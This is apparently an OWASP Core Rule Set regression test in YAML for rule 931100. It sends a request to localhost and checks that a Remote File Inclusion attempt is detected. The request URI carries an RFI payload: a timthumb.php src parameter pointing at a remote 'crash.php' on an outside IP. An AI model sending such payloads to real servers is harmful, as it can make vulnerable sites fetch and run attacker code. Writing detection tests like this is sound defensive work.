---
meta:
  author: "csanders-git, azurit"
rule_id: 931100
tests:
  - test_id: 1
    desc: Remote File Inclusion Attack (931100) from old modsec regressions
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
            Accept-Encoding: gzip, deflate
            Accept-Language: zh-sg
            Host: localhost
            Keep-Alive: '300'
            Proxy-Connection: keep-alive
            Referer: http
            User-Agent: "OWASP CRS test agent"
          method: GET
          port: 80
          uri: "/get/wp-content/themes/thedawn/lib/scripts/timthumb.php?src=http://66.240.183.75/crash.php"
          version: "HTTP/1.1"
        output:
          log:
            expect_ids: [931100]
